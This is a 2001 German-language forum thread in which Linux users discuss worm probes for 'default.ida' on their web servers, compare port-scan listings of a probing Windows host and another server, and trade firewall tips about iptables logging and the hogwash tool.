    christophwth
    christophwth ist offline
    Registrierter Benutzer
    Registriert seit
    Oct 1999
    Ort
    Kiel
    Beiträge
    1.798

    Post

    Hi

    klar wenn der server ein web server darstellt dann kann der port 80 natürlich nicht dicht gemacht macht werden.
    aber es gibt viele leute mit vielen offenen ports im netz unterwegs sind.

    ich habe mir mal den spass gemacht einen solchen rechner zu scannen.
    ich bin kein nt-admin ,aber müssen so viele offen ports auf einem webserver wirklich sein ?

    <pre>
    Port State Service
    80/tcp open http
    111/tcp filtered sunrpc
    135/tcp open loc-srv
    137/tcp filtered netbios-ns
    138/tcp filtered netbios-dgm
    139/tcp filtered netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open listen
    1026/tcp open nterm
    2301/tcp open compaqdiag
    3389/tcp open msrdp
    5000/tcp open fics
    </pre>

    von dem server habe ich die 3 anfragen bekommen

    zum vergleich ,hier ein apache

    <pre>
    21/tcp open ftp
    25/tcp filtered smtp
    80/tcp open http
    111/tcp filtered sunrpc
    136/tcp filtered profile
    137/tcp filtered netbios-ns
    138/tcp filtered netbios-dgm
    139/tcp filtered netbios-ssn
    443/tcp open https
    512/tcp open exec
    8080/tcp open http-proxy
    </pre>

    gruss
    christoph
    Zitieren Zitieren
  8. 07.08.01, 07:48 #8
    Tosk
    Tosk ist offline
    Registrierter Benutzer
    Registriert seit
    Jun 1999
    Beiträge
    629

    Cool

    hallo christoph,

    ich bin zwar kein netzwerk-profi, aber die ports sind nicht vom apache, sondern einfach nur eines servers -- ftp und http-proxy sind keine ports, die apache öffnet!

    lustigerweise laufen solche dienste ja auf den meisten windows-kisten noch nichtmal ;o) -- also solltest Du zum vergleich auch nur http, https und http-proxy anzeigen...

    Tosk
    Zitieren Zitieren
  9. 07.08.01, 20:40 #9
    LKH
    LKH ist offline
    404 - Title not found Avatar von LKH
    Registriert seit
    Jun 1999
    Ort
    Jena
    Beiträge
    3.709

    Post

    Hallo,

    auch Linuxserver werden gescannt (die Anfragen kamen eben aus Italien und Spanien). Alle IPs beginnen mit 213.

    Der Apache meldet nur brav, dass es die Datei default.ida nicht gibt. Also kein Grund zur Panik. Meine default heisst übrigends auch nicht Ida sonder Angie
    freedom is just another word for nothing left to loose ...
    Zitieren Zitieren
  10. 08.08.01, 09:44 #10
    netzmeister
    netzmeister ist offline
    Kommunikator
    Registriert seit
    Apr 1999
    Ort
    Reutlingen
    Beiträge
    3.673

    Exclamation

    Hallo,

    hier ein Tip:
    http://hogwash.sourceforge.net/

    Damit lassen sich Pakete löschen oder auch modifizieren.

    Grüsse

    Eicke
    Zitieren Zitieren
  11. 08.08.01, 12:51 #11
    Hein
    Hein ist offline
    Registrierter Benutzer
    Registriert seit
    May 1999
    Ort
    Vettelschoß, RP, Germany
    Beiträge
    366

    Post

    Jau, meine frisch eingerichteten iptables haben mir heute nacht auch jede Menge Einbruchversuche gemeldet - insb. auf Port 25 (smtp). Das war das reinste Bombardement. Die IP-Adressen kamen allerdings aus den unterschiedlichsten Ecken. Ich nehme mal an, dass die eh gefälscht sind.

    Hein
    AMD K6/2-500
    256 MB RAM
    Mandrake 8.1
    Zitieren Zitieren
  12. 08.08.01, 13:20 #12
    berell
    Gast

    Post

    da hätt ich grad mal ne frage zum loggen solcher angriffe :
    wie bekmme ich die denn mit iptables in eine datei z.b. /var/log/firewall-log geloggt?
    -bernd
    Zitieren Zitieren
  13. 11.08.01, 22:26 #13
    Sven_R
    Sven_R ist offline
    Registrierter Benutzer Avatar von Sven_R
    Registriert seit
    Dec 2000
    Ort
    12049 Berlin
    Beiträge
    476

    Post

    hi
    also ich hab mich in letzter zeit auch schon gewundert wer da was macht.
    leider hab ich nichts gefunden.

    das dies zeichen wirr warr ein ISS virus ist hab ich jetzt bemerkt.

    Gott sei DANK ich hab ja nen LINUX SERVER und nicht so eine ISS schleuder.

    ich muss sagen das solche viren schei..e finde, okay alle viren sind das.
    aber die meisten stören ja nur das system und nicht das netzwerk.
    das internet ist schon lahm genug in letzter zeit, da sollte man nicht auch noch viren erzeugen die per zufall alle ISS server suchen.
    cu
    Roellig IT
    Blog
    Bauanleitung-Linuxserver.de
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln